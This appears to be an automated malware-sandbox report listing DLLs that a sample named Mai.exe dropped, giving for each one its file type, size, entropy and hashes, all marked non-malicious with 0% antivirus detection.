                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):19456
                                                          Entropy (8bit):5.7981108922569735
                                                          Encrypted:false
                                                          SSDEEP:384:qPHNP3MjevhSY/8EBbVxcJ0ihTLdFDuPHgj+kf4D:sPcKvr/jUJ0sbDGAj+t
                                                          MD5:AB0BCB36419EA87D827E770A080364F6
                                                          SHA1:6D398F48338FB017AACD00AE188606EB9E99E830
                                                          SHA-256:A927548ABEA335E6BCB4A9EE0A949749C9E4AA8F8AAD481CF63E3AC99B25A725
                                                          SHA-512:3580FB949ACEE709836C36688457908C43860E68A36D3410F3FA9E17C6A66C1CDD7C081102468E4E92E5F42A0A802470E8F4D376DAA4ED7126818538E0BD0BC4
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):22016
                                                          Entropy (8bit):5.865452719694432
                                                          Encrypted:false
                                                          SSDEEP:384:y1jwGPJHLvzcY1EEerju9LcTZ6RO3RouLKtcyDNOcwgjxo:QjwyJUYToZwOLuzDNB1j
                                                          MD5:C8FE3FF9C116DB211361FBB3EA092D33
                                                          SHA1:180253462DD59C5132FBCCC8428DEA1980720D26
                                                          SHA-256:25771E53CFECB5462C0D4F05F7CAE6A513A6843DB2D798D6937E39BA4B260765
                                                          SHA-512:16826BF93C8FA33E0B5A2B088FB8852A2460E0A02D699922A39D8EB2A086E981B5ACA2B085F7A7DA21906017C81F4D196B425978A10F44402C5DB44B2BF4D00A
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):22016
                                                          Entropy (8bit):5.867732744112887
                                                          Encrypted:false
                                                          SSDEEP:384:51jwGPJHLxzcY1EEerju9LcTZ6RO3RouLKtcyDNIegjxo:rjwyJOYToZwOLuzDNI7j
                                                          MD5:A442EA85E6F9627501D947BE3C48A9DD
                                                          SHA1:D2DEC6E1BE3B221E8D4910546AD84FE7C88A524D
                                                          SHA-256:3DBCB4D0070BE355E0406E6B6C3E4CE58647F06E8650E1AB056E1D538B52B3D3
                                                          SHA-512:850A00C7069FFDBA1EFE1324405DA747D7BD3BA5D4E724D08A2450B5A5F15A69A0D3EAF67CEF943F624D52A4E2159A9F7BDAEAFDC6C689EACEA9987414250F3B
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):27136
                                                          Entropy (8bit):5.860044313282322
                                                          Encrypted:false
                                                          SSDEEP:384:xFDL3RqE3MjjQ95UnLa+1WT1aA7qHofg5JptfISH2mDDXfgjVx2:jDLh98jjRe+1WT1aAeIfMzxH2mDDIj
                                                          MD5:59BA0E05BE85F48688316EE4936421EA
                                                          SHA1:1198893F5916E42143C0B0F85872338E4BE2DA06
                                                          SHA-256:C181F30332F87FEECBF930538E5BDBCA09089A2833E8A088C3B9F3304B864968
                                                          SHA-512:D772042D35248D25DB70324476021FB4303EF8A0F61C66E7DED490735A1CC367C2A05D7A4B11A2A68D7C34427971F96FF7658D880E946C31C17008B769E3B12F
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):27136
                                                          Entropy (8bit):5.917025846093607
                                                          Encrypted:false
                                                          SSDEEP:384:tFYLXRqEnMgj969GUnLa+1WT1aA7qHofg5JptfIS320DXwElrgjhig:PYLB9Mgj0e+1WT1aAeIfMzx320DXD+j
                                                          MD5:8194D160FB215498A59F850DC5C9964C
                                                          SHA1:D255E8CCBCE663EE5CFD3E1C35548D93BFBBFCC0
                                                          SHA-256:55DEFCD528207D4006D54B656FD4798977BD1AAE6103D4D082A11E0EB6900B08
                                                          SHA-512:969EEAA754519A58C352C24841852CF0E66C8A1ADBA9A50F6F659DC48C3000627503DDFB7522DA2DA48C301E439892DE9188BF94EEAF1AE211742E48204C5E42
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):12800
                                                          Entropy (8bit):4.999870226643325
                                                          Encrypted:false
                                                          SSDEEP:192:DzFRF/1nb2mhQtk4axusjfkgZhoYDQgRjcqgQvEty:DzFd2f64axnTTz5D1gQvEty
                                                          MD5:C89BECC2BECD40934FE78FCC0D74D941
                                                          SHA1:D04680DF546E2D8A86F60F022544DB181F409C50
                                                          SHA-256:E5B6E58D6DA8DB36B0673539F0C65C80B071A925D2246C42C54E9FCDD8CA08E3
                                                          SHA-512:715B3F69933841BAADC1C30D616DB34E6959FD9257D65E31C39CD08C53AFA5653B0E87B41DCC3C5E73E57387A1E7E72C0A668578BD42D5561F4105055F02993C
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13312
                                                          Entropy (8bit):5.025153056783597
                                                          Encrypted:false
                                                          SSDEEP:192:AF/1nb2mhQtks0iiNqdF4mtPjD02A5APYcqgYvEL2x:62f6fFA/4GjDFcgYvEL2x
                                                          MD5:C4CC05D3132FDFB05089F42364FC74D2
                                                          SHA1:DA7A1AE5D93839577BBD25952A1672C831BC4F29
                                                          SHA-256:8F3D92DE840ABB5A46015A8FF618FF411C73009CBAA448AC268A5C619CF84721
                                                          SHA-512:C597C70B7AF8E77BEEEBF10C32B34C37F25C741991581D67CF22E0778F262E463C0F64AA37F92FBC4415FE675673F3F92544E109E5032E488F185F1CFBC839FE
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):16384
                                                          Entropy (8bit):5.235115741550938
                                                          Encrypted:false
                                                          SSDEEP:192:XTRgffnRaNfBj9xih1LPK73jm6AXiN4rSRIh42gDhgvrjcqgCieT3WQ:XafgNpj9cHW3jqXeBRamDOZgCieT
                                                          MD5:1E201DF4B4C8A8CD9DA1514C6C21D1C4
                                                          SHA1:3DC8A9C20313AF189A3FFA51A2EAA1599586E1B2
                                                          SHA-256:A428372185B72C90BE61AC45224133C4AF6AE6682C590B9A3968A757C0ABD6B4
                                                          SHA-512:19232771D4EE3011938BA2A52FA8C32E00402055038B5EDF3DDB4C8691FA7AE751A1DC16766D777A41981B7C27B14E9C1AD6EBDA7FFE1B390205D0110546EE29
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):15360
                                                          Entropy (8bit):5.133714807569085
                                                          Encrypted:false
                                                          SSDEEP:192:JZNGXEgvUh43G6coX2SSwmPL4V7wTdDlpaY2cqgWjvE:EVMhuGGF2L4STdDyYWgWjvE
                                                          MD5:76C84B62982843367C5F5D41B550825F
                                                          SHA1:B6DE9B9BD0E2C84398EA89365E9F6D744836E03A
                                                          SHA-256:EBCD946F1C432F93F396498A05BF07CC77EE8A74CE9C1A283BF9E23CA8618A4C
                                                          SHA-512:03F8BB1D0D63BF26D8A6FFF62E94B85FFB4EA1857EB216A4DEB71C806CDE107BA0F9CC7017E3779489C5CEF5F0838EDB1D70F710BCDEB629364FC288794E6AFE
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):35840
                                                          Entropy (8bit):5.928082706906375
                                                          Encrypted:false
                                                          SSDEEP:768:8bEkzS7+k9rMUb8cOe9rs9ja+V/Mhjh56GS:8bEP779rMtcOCs0I/Mhf
                                                          MD5:B41160CF884B9E846B890E0645730834
                                                          SHA1:A0F35613839A0F8F4A87506CD59200CCC3C09237
                                                          SHA-256:48F296CCACE3878DE1148074510BD8D554A120CAFEF2D52C847E05EF7664FFC6
                                                          SHA-512:F4D57351A627DD379D56C80DA035195292264F49DC94E597AA6638DF5F4CF69601F72CC64FC3C29C5CBE95D72326395C5C6F4938B7895C69A8D839654CFC8F26
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):12288
                                                          Entropy (8bit):4.799063285091512
                                                          Encrypted:false
                                                          SSDEEP:192:nkCfXASTMeAk4OepIXcADp/X6RcqgO5vE:ZJMcPepIXcAD563gO5vE
                                                          MD5:BA46602B59FCF8B01ABB135F1534D618
                                                          SHA1:EFF5608E05639A17B08DCA5F9317E138BEF347B5
                                                          SHA-256:B1BAB0E04AC60D1E7917621B03A8C72D1ED1F0251334E9FA12A8A1AC1F516529
                                                          SHA-512:A5E2771623DA697D8EA2E3212FBDDE4E19B4A12982A689D42B351B244EFBA7EFA158E2ED1A2B5BC426A6F143E7DB810BA5542017AB09B5912B3ECC091F705C6E
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):754688
                                                          Entropy (8bit):7.624959985050181
                                                          Encrypted:false
                                                          SSDEEP:12288:I1UrmZ9HoxJ8gf1266y8IXhJvCKAmqVLzcrZgYIMGv1iLD9yQvG6h9:gYmzHoxJFf1p34hcrn5Go9yQO6L
                                                          MD5:3F20627FDED2CF90E366B48EDF031178
                                                          SHA1:00CED7CD274EFB217975457906625B1B1DA9EBDF
                                                          SHA-256:E36242855879D71AC57FBD42BB4AE29C6D80B056F57B18CEE0B6B1C0E8D2CF57
                                                          SHA-512:05DE7C74592B925BB6D37528FC59452C152E0DCFC1D390EA1C48C057403A419E5BE40330B2C5D5657FEA91E05F6B96470DDDF9D84FF05B9FD4192F73D460093C
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):27648
                                                          Entropy (8bit):5.792654050660321
                                                          Encrypted:false
                                                          SSDEEP:384:hBwi/rOF26VZW1n0n/Is42g9qhrnW0mvPauYhz35sWJftjb1Ddsia15gkbQ0e1:/L/g28Ufsxg9GmvPauYLxtX1D/kf
                                                          MD5:290D936C1E0544B6EC98F031C8C2E9A3
                                                          SHA1:CAEEA607F2D9352DD605B6A5B13A0C0CB1EA26EC
                                                          SHA-256:8B00C859E36CBCE3EC19F18FA35E3A29B79DE54DA6030AAAD220AD766EDCDF0A
                                                          SHA-512:F08B67B633D3A3F57F1183950390A35BF73B384855EAAB3AE895101FBC07BCC4990886F8DE657635AD528D6C861BC2793999857472A5307FFAA963AA6685D7E8
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):67072
                                                          Entropy (8bit):6.060461288575063
                                                          Encrypted:false
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):10752
                                                          Entropy (8bit):4.488437566846231
                                                          Encrypted:false
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):10240
                                                          Entropy (8bit):4.730605326965181
                                                          Encrypted:false
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):10240
                                                          Entropy (8bit):4.685843290341897
                                                          Encrypted:false
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):109440
                                                          Entropy (8bit):6.642252418996898
                                                          Encrypted:false
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):49560
                                                          Entropy (8bit):6.6649899041961875
                                                          Encrypted:false
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):65304
                                                          Entropy (8bit):6.187244032149753
                                                          Encrypted:false
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):84760
                                                          Entropy (8bit):6.571366239395909
                                                          Encrypted:false
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):181248
                                                          Entropy (8bit):6.186854863391558
                                                          Encrypted:false
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):123672
                                                          Entropy (8bit):6.0603476725812415
                                                          Encrypted:false
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):253720
                                                          Entropy (8bit):6.554150968006557
                                                          Encrypted:false
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):65304
                                                          Entropy (8bit):6.256836184121913
                                                          Encrypted:false
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):159000
                                                          Entropy (8bit):6.8491410545695715
                                                          Encrypted:false
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):34584
                                                          Entropy (8bit):6.410940768849398
                                                          Encrypted:false
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):50968
                                                          Entropy (8bit):6.433137711787963
                                                          Encrypted:false
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):32536
                                                          Entropy (8bit):6.452372346765785
                                                          Encrypted:false
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):79640
                                                          Entropy (8bit):6.290503224602847
                                                          Encrypted:false
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):120088
                                                          Entropy (8bit):6.257365630046476
                                                          Encrypted:false
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):176920
                                                          Entropy (8bit):5.954664688637172
                                                          Encrypted:false
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13736
                                                          Entropy (8bit):6.830867642122176
                                                          Encrypted:false
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13224
                                                          Entropy (8bit):6.838675218358012
                                                          Encrypted:false
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13224
                                                          Entropy (8bit):6.843944025237199
                                                          Encrypted:false
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13224
                                                          Entropy (8bit):6.890661662475156
                                                          Encrypted:false
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):16808
                                                          Entropy (8bit):6.765025764551782
                                                          Encrypted:false
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13224
                                                          Entropy (8bit):6.862975499159515
                                                          Encrypted:false
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13224
                                                          Entropy (8bit):6.946959524345588
                                                          Encrypted:false
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13224
                                                          Entropy (8bit):6.862911306065441
                                                          Encrypted:false
                                                          SSDEEP:192:WxWfhWmeWvcuyjS7HnhWgN7aUWhR1+Eh+Il+jX01k9z3AReXz:WxWfhWg7HRN7eEQEjR9zSeD
                                                          MD5:10F0C22C19D5BEE226845CD4380B4791
                                                          SHA1:1E976A8256508452C59310CA5987DB3027545F3D
                                                          SHA-256:154EF0BF9B9B9DAA08101E090AA9716F0FA25464C4EF5F49BC642619C7C16F0E
                                                          SHA-512:3A5D3DC6448F65E1613E1A92E74F0934DD849433CECA593E7F974310CD96BF6AD6CCC3B0CB96BDB2DCC35514BC142C48CB1FD20FEE0D8FA236999AD155FC518B
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13736
                                                          Entropy (8bit):6.815548225091973
                                                          Encrypted:false
                                                          SSDEEP:192:WUZlKWfhWieWvcuyjS7HnhWgN7a8WhwXh+Il+jX01k9z3ARxiXNk:W6lKWfhWM7HRN7J5EjR9zSw9k
                                                          MD5:405038FB22CD8F725C2867C9B4345B65
                                                          SHA1:385F0EB610FCE082B56A90F1B10346C37C19D485
                                                          SHA-256:1C1B88D403E2CDE510741A840AFA445603F76E542391547E6E4CC48958C02076
                                                          SHA-512:B52752AC5D907DC442EC7C318998FD54AD9AD659BDE4350493FE5CA95286ECEFCBBBF82D718D4BF4E813B4D20A62CD1F7BA11EE7C68C49EC39307B7746968D18
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13224
                                                          Entropy (8bit):6.877222097685592
                                                          Encrypted:false
                                                          SSDEEP:192:WzWfhWceWvcuyjS7HnhWgN7a8Whkh+Il+jX01k9z3ARNXJXEmo:WzWfhWG7HRN7NEjR9zSN5XJo
                                                          MD5:AFF9165CFF0FB1E49C64B9E1EAEFDD86
                                                          SHA1:CDEF56AB5734D10A08BC373C843ABC144FE782CB
                                                          SHA-256:159ECB50F14E3C247FAEC480A3E6E0CF498EC13039C988F962280187CEE1391D
                                                          SHA-512:64DDF8965DEFAF5E5AE336D37BDB3868538638BAD927E2E76E06ACE51A2BCA60AEFAAB18C300BB7E705F470A937AD978EDD0338091AD6BCC45564C41071EEB40
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):14248
                                                          Entropy (8bit):6.819759709049553
                                                          Encrypted:false
                                                          SSDEEP:192:WivuBL3BBLJWfhWGeWvcuyjS7HnhWgN7a8WhfZVh+Il+jX01k9z3ARLFXWk:WivuBL3BrWfhWA7HRN7cZLEjR9zSZGk
                                                          MD5:4334F1A7B180998473DC828D9A31E736
                                                          SHA1:4C0C14B5C52AB5CF43A170364C4EB20AFC9B5DD4
                                                          SHA-256:820E3ACD26AD7A6177E732019492B33342BC9200FC3C0AF812EBD41FB4F376CB
                                                          SHA-512:7F2A12F9D41F3C55C4AFF2C75EB6F327D9434269EBFF3FBCC706D4961DA10530C069720E81B1573FAF919411F929304E4AAF2159205CF9A434B8833EEA867AA9
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):15776
                                                          Entropy (8bit):6.867557538513122
                                                          Encrypted:false
                                                          SSDEEP:384:WbOMw3zdp3bwjGjue9/0jCRrndbWsWfhWU7HRN7ApUad+JR9zuszu:yOMwBprwjGjue9/0jCRrndbGDVadk9zk
                                                          MD5:71457FD15DE9E0B3AD83B4656CAD2870
                                                          SHA1:C9C2CAF4F9E87D32A93A52508561B4595617F09F
                                                          SHA-256:DB970725B36CC78EF2E756FF4B42DB7B5B771BFD9D106486322CF037115BD911
                                                          SHA-512:A10FCF1D7637EFFFF0AE3E3B4291D54CC7444D985491E82B3F4E559FBB0DBB3B6231A8C689FF240A5036A7ACAE47421CDA58AAA6938374D4B84893CCE0077BC8
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13736
                                                          Entropy (8bit):6.854527300629819
                                                          Encrypted:false
                                                          SSDEEP:192:W/qWfhW0eWvcuyjS7HnhWgN7a8Wh+Yq21eX01k9z3ABfNB/xqw:W/qWfhWe7HRN7Ql8R9zmfNB0w
                                                          MD5:D39FBBEAC429109849EC7E0DC1EC6B90
                                                          SHA1:2825C7ABA7F3E88F7B3D3BC651BBC4772BB44AD0
                                                          SHA-256:AEEC3D48068137870E6E40BAD9C9F38377AA06C6EA1AC288E9E02AF9E8C28E6B
                                                          SHA-512:B4197A4D19535E20ED2AFF4F83ACED44E56ABBB99CE64E2F257D7F9B13882CBDB16D8D864F4923499241B8F7D504D78FF93F22B95F7B02996B15BB3DA1A0EF42
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13224
                                                          Entropy (8bit):6.955574425170444
                                                          Encrypted:false
                                                          SSDEEP:192:WUWfhWyeWvcuyjS7HnhWgN7a8WhYw0mh+Il+jX01k9z3ARj4XGAzux:WUWfhWc7HRN7GXEjR9zSk2AzA
                                                          MD5:0E5CD808E9F407E75F98BBB602A8DF48
                                                          SHA1:285E1295A1CF91EF2306BE5392190D8217B7A331
                                                          SHA-256:1846947C10B57876239D8CB74923902454F50B347385277F5313D2A6A4E05A96
                                                          SHA-512:7D8E35CABE7C3B963E6031CD73DC5AD5EDF8B227DF735888B28D8EFB5744B531F0C84130E47624E4FEA8EF700EABDE20A4E2290A1688A6ACFFB6A09CA20D7085
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):14248
                                                          Entropy (8bit):6.824261156098003
                                                          Encrypted:false
                                                          SSDEEP:192:WAWWfhWZeWvcuyjS7HnhWgN7a8Wh0Dq21eX01k9z3ABfNBd5++x:WAWWfhWZ7HRN7rDl8R9zmfNBf+k
                                                          MD5:CC52CD91B1CBD20725080F1A5C215FCC
                                                          SHA1:2CE6A32A5BD6FA9096352D3D73E7B19B98E0CC49
                                                          SHA-256:990DC7898FD7B442D50BC88FEC624290D69F96030A1256385391B05658952508
                                                          SHA-512:D262F62ADDE8A3D265650A4B56C866BDD2B660001FB2CA679D48EE389254E9FFA6CE9D69F2AAA619D22A155A5523DCE5F7CFDD7638C0E9DF1FE524B09520D5A3
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):15272
                                                          Entropy (8bit):6.869458023567228
                                                          Encrypted:false
                                                          SSDEEP:384:WyWXk1JzNcKSIHWfhWH7HRN7pEjR9zSgX:BbcKStkpEF9zZ
                                                          MD5:2DD711EA0F97CB7C5AB98AE6F57B9439
                                                          SHA1:CBA11E3EEBE7B3D007EB16362785F5D1D1251ACD
                                                          SHA-256:A958FD20C06C90112E9E720047D84531B2BD0C77174660DC7E1F093A2ED3CC68
                                                          SHA-512:D8D39CA07FDFED6A4E5686EAE766022941C19BFBCEB5972EDD109B453FD130B627E3E2880F8580A8A41601493D0C800E64A76E8590070AA13C1ABD550BD1A1BA
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13736
                                                          Entropy (8bit):6.883994552966322
